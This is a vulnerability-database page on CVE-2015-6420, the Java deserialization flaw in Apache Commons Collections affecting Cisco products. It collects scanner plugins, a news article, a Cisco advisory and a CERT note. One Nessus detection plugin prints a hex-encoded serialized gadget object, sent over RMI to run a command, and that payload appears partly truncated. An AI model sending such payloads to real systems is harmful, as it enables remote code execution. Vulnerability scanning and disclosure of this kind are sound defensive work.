ID CVE-2015-6420 Type cve Reporter cve@mitre.org Modified 2018-10-01T21:29:00
Description
Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.
{"openvas": [{"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "scanner", "description": "This host is running Cisco\n WebEx Meetings Server and is prone to a java deserialization vulnerability.", "modified": "2019-03-14T00:00:00", "published": "2016-09-22T00:00:00", "id": "OPENVAS:1361412562310809053", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809053", "title": "Cisco WebEx Meetings Server Java Deserialization Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_webex_meetings_server_rce_vuln.nasl 14181 2019-03-14 12:59:41Z cfischer $\n#\n# Cisco WebEx Meetings Server Java Deserialization Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:webex_meetings_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809053\");\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_version(\"$Revision: 14181 $\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:59:41 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-22 13:01:32 +0530 (Thu, 22 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Cisco WebEx Meetings Server Java Deserialization Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Cisco\n WebEx Meetings Server and is prone to a java deserialization vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an insecure\n deserialization of user-supplied content by the affected software. 
An attacker\n could exploit this vulnerability by submitting crafted input to an application\n on a targeted system that uses the ACC library.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allow an\n unauthenticated, remote attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Cisco WebEx Meetings Server 2.5 before\n 2.5.1.6183, 2.6 before 2.6.1.45 and 2.0 versions.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Cisco WebEx Meetings Server\n version 2.5.1.6183 or 2.6.1.1099 or 2.6.1.45 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux17638\");\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CISCO\");\n script_dependencies(\"gb_cisco_webex_meetings_server_detect.nasl\");\n script_mandatory_keys(\"cisco/webex/detected\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!ciscoPort = get_app_port(cpe:CPE)){\n exit( 0 );\n}\n\nif(!vers = get_app_version(cpe:CPE, port:ciscoPort)){\n exit( 0 );\n}\n\nif(vers =~ \"^(2\\.6)\")\n{\n if(version_is_less(version:vers, test_version:\"2.6.1.45\"))\n {\n fix = \"2.6.1.1099 or 2.6.1.45\";\n VULN = TRUE;\n }\n}\nelse if(vers =~ \"^(2\\.5)\")\n{\n if(version_is_less(version:vers, test_version:\"2.5.1.6183\"))\n {\n fix = \"2.5.1.6183\";\n VULN = TRUE;\n }\n}\nelse if(vers =~ \"^(2\\.0)\")\n{\n if(version_is_less(version:vers, test_version:\"2.0.1.950\"))\n {\n fix = \"2.0.1.950 or 2.0.1.951 or 2.0.1.956\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:ciscoPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:22", "bulletinFamily": "info", "description": "Last year Google employees took an initiative to help thousands of open source projects patch a critical remote code execution vulnerability in a widely used Apache Commons Collections (ACC) library. \n \nDubbed **Operation Rosehub**, the initiative was volunteered by some 50 Google employees, who used 20 percent of their work time to patch over 2600 open source projects on GitHub that were vulnerable to the \"Mad Gadget vulnerability.\" \n \n**[Mad Gadget](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) vulnerability** ([CVE-2015-6420](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>)) is a remote code execution bug in the Java deserialization used by the Apache Commons Collections (ACC) library that could allow an unauthenticated, remote attacker to execute arbitrary code on a system. \n \nThe ACC library is widely deployed by many Java applications to decode data passed between computers. To exploit this flaw, all an unauthorized attacker needs to do is submit maliciously crafted input to an application on a targeted system that uses the ACC library. \n \nOnce the vulnerable ACC library on the affected system deserializes the content, the attacker could remotely execute arbitrary code on the compromised system, which could then be used to conduct further attacks. 
\n \n**Remember the [ransomware attack on the Muni Metro System](<https://thehackernews.com/2016/11/transit-system-hacked.html>)?** Late last year, an anonymous hacker managed to infect and take over more than 2,000 computers using this same Mad Gadget flaw in the software used to operate San Francisco's public transport system. \n \nFollowing the public disclosure of the Mad Gadget flaw, almost every commercial enterprise, including Oracle, Cisco, Red Hat, VMware, IBM, Intel, Adobe, HP, Jenkins, and SolarWinds, formally disclosed that they had been impacted by this vulnerability and patched it in their software. \n \nHowever, a few months after all the big businesses had patched the flaw, one of the Google employees noticed that several prominent open source libraries were still depending on vulnerable versions of the ACC library. \n\n\n> \"We recognized that the industry best practices had failed. An action was needed to keep the open source community safe. So rather than simply posting a security advisory asking everyone to address the vulnerability, we formed a task force to update their code for them. That initiative was called Operation Rosehub,\" Justine Tunney, Software Engineer on TensorFlow, wrote on the Google [Open Source Blog](<https://opensource.googleblog.com/2017/03/operation-rosehub.html>).\n\nUnder Operation Rosehub, patches were sent to many open source projects, although the Google employees were only able to patch open source projects on GitHub that directly referenced vulnerable versions of the ACC library. 
\n \nAccording to the Open Source Blog, if the San Francisco Municipal Transportation Agency's software systems had been open source, Google engineers would also have been able to deliver Mad Gadget patches to them, and their systems would never have been compromised.\n", "modified": "2017-03-03T14:53:27", "published": "2017-03-02T00:48:00", "id": "THN:90DC43ADC5123FED500235ACDF6D6277", "href": "https://thehackernews.com/2017/03/google-mad-gadget-flaw.html", "type": "thn", "title": "Google Employees Help Thousands Of Open Source Projects Patch Critical \u2018Mad Gadget Bug\u2019", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-17T18:17:28", "bulletinFamily": "scanner", "description": "According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability due to unsafe deserialize\ncalls of unauthenticated Java objects to the Apache Commons\nCollections (ACC) library. 
An unauthenticated, remote attacker can\nexploit this, via crafted Java objects, to execute arbitrary code on\nthe target host.", "modified": "2019-11-02T00:00:00", "id": "CISCO_CUCM_CSCUX34835.NASL", "href": "https://www.tenable.com/plugins/nessus/93939", "published": "2016-10-10T00:00:00", "title": "Cisco Unified Communications Manager Java Object Deserialization RCE (CSCux34835)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93939);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCux34835\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20151209-java-deserialization\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Cisco Unified Communications Manager Java Object Deserialization RCE (CSCux34835)\");\n script_summary(english:\"Checks the version of Cisco Unified Communications Manager (CUCM).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability due to unsafe deserialize\ncalls of unauthenticated Java objects to the Apache Commons\nCollections (ACC) library. 
An unauthenticated, remote attacker can\nexploit this, via crafted Java objects, to execute arbitrary code on\nthe target host.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?94b4a89a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux34835/\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Unified Communications Manager version 9.1(2)SU5 /\n10.5(2)SU3a / 11.0(1a)SU2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version\");\nver_display = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version_Display\");\nfix_display = FALSE;\napp_name = \"Cisco Unified Communications Manager (CUCM)\";\n\n# No fix for 8\nif (ver =~ \"^[1-8]\\.\")\n fix_display = \"9.1(2)su5 / 9.1(2.15126.1)\";\nelse if (ver =~ \"^9\\.\" && ver_compare(ver:ver, fix:'9.1.2.15126.1', strict:FALSE) < 0)\n fix_display = \"9.1(2)su5 / 9.1(2.15126.1)\";\nelse if (ver =~ \"^10\\.\" && ver_compare(ver:ver, fix:'10.5.2.14065.1', strict:FALSE) < 0)\n fix_display = \"10.5(2)su3a / 10.5(2.14065.1)\";\nelse if (ver =~ \"^11\\.\" && ver_compare(ver:ver, fix:'11.0.1.22041.1', strict:FALSE) < 0)\n fix_display = \"11.0(1a)su2 / 11.0(1.22041.1)\";\n\nif (!fix_display)\n audit(AUDIT_INST_VER_NOT_VULN, app_name, ver_display);\n\norder = make_list('Cisco bug ID', 'Installed release', 'Fixed release');\nreport = make_array(\n order[0], \"CSCux34835\",\n order[1], ver_display,\n order[2], fix_display\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\nsecurity_report_v4(extra:report, port:0, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T18:17:29", "bulletinFamily": "scanner", "description": "The Cisco Prime Lan Management Solution (LMS) running on the remote\nweb server is affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. 
An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host.", "modified": "2019-11-02T00:00:00", "id": "CISCO_PRIME_LMS_JAVA_DESER.NASL", "href": "https://www.tenable.com/plugins/nessus/99934", "published": "2017-05-02T00:00:00", "title": "Cisco Prime LAN Management Solution Java Object Deserialization RCE (CSCux34647)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99934);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCux34647\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Cisco Prime LAN Management Solution Java Object Deserialization RCE (CSCux34647)\");\n script_summary(english:\"Sends an unexpected Java object to the RMI registry.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system running on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cisco Prime Lan Management Solution (LMS) running on the remote\nweb server is affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. 
An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux34647\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"No release is planned by the vendor to fix this vulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_lan_management_solution\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_lms_web_detect.nasl\", \"rmiregistry_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_lms\");\n script_require_ports(\"Services/rmi_registry\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"rmi.inc\");\n\nappname = 'cisco_lms';\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_service(svc:\"rmi_registry\", ipproto:\"tcp\", exit_on_fail:TRUE);\nsoc = rmi_connect(port:port);\n\n# Due to the nature of this exploit, we can't see the result of the\n# commands we execute. However, successful execution of our command\n# will always result in a specific exception being sent back to us.\n# This object (CommonCollections1) executes 'whoami' and we look\n# for the exception that indicates successful deserialization\nrequest = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x14\\x70\\x77\\x6e\\x65\\x64\\x32\\x39\\x33\\x38\\x34\\x38\\x31\\x36\\x30\\x37\\x31\\x38\\x39\\x38\\x32\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x7
0\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f';\n\nsend(socket:soc, data:request);\nres = recv(socket:soc, length:0x1000, min:0x800);\nclose(soc);\n\nif (isnull(res) || \"Integer cannot be cast to java.util.Set\" >!< res)\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T18:17:29", "bulletinFamily": "scanner", "description": "The version of Cisco Security Manager running on the remote web server\nis affected by a remote code execution vulnerability due to unsafe\ndeserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. 
An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host", "modified": "2019-11-02T00:00:00", "id": "CISCO_SECURITY_JAVA_DESER.NASL", "href": "https://www.tenable.com/plugins/nessus/99935", "published": "2017-05-02T00:00:00", "title": "Cisco Security Manager Java Object Deserialization RCE (CSCux34671)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99935);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCux34671\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Cisco Security Manager Java Object Deserialization RCE (CSCux34671)\");\n script_summary(english:\"Sends an unexpected Java object to the server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco Security Manager running on the remote web server\nis affected by a remote code execution vulnerability due to unsafe\ndeserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. 
An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux34671\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCux34671.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:security_manager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_security_manager_http_detect.nbin\", \"rmiregistry_detect.nasl\");\n script_require_keys(\"installed_sw/Cisco Security Manager\");\n script_require_ports(\"Services/rmi_registry\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"rmi.inc\");\n\nappname = \"Cisco Security Manager\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_service(svc:\"rmi_registry\", ipproto:\"tcp\", exit_on_fail:TRUE);\n\n# grab information about CSM that we can report to the customer\nhttp_port = get_http_port(default:443);\ninstall = get_single_install(app_name:appname, port:http_port);\n\n# connect to the rmi port\nsoc = rmi_connect(port:port);\n\n# Due to the nature of this exploit, we can't see the result of the\n# commands we execute. However, successful execution of our command\n# will always result in a specific exception being sent back to us.\n# This object (CommonCollections1) executes 'whoami' and we look\n# for the exception that indicates successful deserialization\nrequest = 
'<hex-encoded serialized CommonsCollections1 gadget payload omitted>';\n\nsend(socket:soc, data:request);\nres = recv(socket:soc, length:0x1000, min:0x800);\nclose(soc);\n\nif (isnull(res) || \"Integer cannot be cast to java.util.Set\" >!< res)\n{\n
audit(AUDIT_INST_VER_NOT_VULN, appname, install[\"version\"]);\n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2019-10-14T21:30:12", "bulletinFamily": "software", "description": "A vulnerability in the Java deserialization used by the Apache Commons Collections (ACC) library could allow an unauthenticated, remote attacker to execute arbitrary code.\n\nThe vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by submitting crafted input to an application on a targeted system that uses the ACC library. After the vulnerable library on the affected system deserializes the content, the attacker could execute arbitrary code on the system, which could be used to conduct further attacks.\n\nOn November 6, 2015, Foxglove Security Group published information about a remote code execution vulnerability that affects multiple releases of the ACC library. The report contains detailed proof-of-concept code for a number of applications, including WebSphere Application Server, JBoss, Jenkins, OpenNMS, and WebLogic. This is a remotely exploitable vulnerability that allows an attacker to inject any malicious code or execute any commands that exist on the server. A wide range of potential impacts includes allowing the attacker to obtain sensitive information.\n\nObject serialization is a technique that many programming languages use to convert an object into a sequence of bits for transfer purposes. Deserialization is a technique that reassembles those bits back to an object. 
This vulnerability occurs in Java object serialization for network transport and object deserialization on the receiving side.\n\nMany applications accept serialized objects from the network without performing input validation checks before deserializing them. Crafted serialized objects can therefore lead to execution of arbitrary attacker code.\n\nAlthough the problem itself is in the serialization and deserialization functionality of the Java programming language, the ACC library is known to be affected by this vulnerability. Any application or application framework could be vulnerable if it uses the ACC library and deserializes arbitrary, user-supplied Java serialized data.\n\nAdditional details about the vulnerability are available at the following links:\n\nOfficial Vulnerability Note from CERT [\"http://www.kb.cert.org/vuls/id/576313\"]\nFoxglove Security [\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\"]\nApache Commons Statement [\"https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread\"]\nOracle Security Alert [\"https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852\"]\n\nCisco will release software updates that address this vulnerability. 
There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization\"]", "modified": "2019-01-07T19:53:07", "published": "2015-12-09T16:00:00", "id": "CISCO-SA-20151209-JAVA-DESERIALIZATION", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization", "type": "cisco", "title": "Vulnerability in Java Deserialization Affecting Cisco Products", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-09T19:49:13", "bulletinFamily": "info", "description": "### Overview \n\nThe TP-LINK EAP Controller is TP-LINK's software for remotely controlling wireless access point devices. EAP Controller for Linux lacks user authentication for RMI service commands, as well as utilizes an outdated vulnerable version of Apache commons-collections, which may allow an attacker to implement deserialization attacks and control the EAP Controller server.\n\n### Description \n\n[](<http://cwe.mitre.org/data/definitions/306.html>)\n\n[**CWE-306**](<http://cwe.mitre.org/data/definitions/306.html>)**: Missing Authentication for Critical Function - **CVE-2018-5393 \n \nEAP Controller for Linux utilizes a Java remote method invocation (RMI) service for remote control. The RMI interface does not require any authentication before use. Remote attackers can implement deserialization attacks through the RMI protocol. Successful attacks may allow a remote attacker to remotely control the target server and execute Java functions or bytecode. 
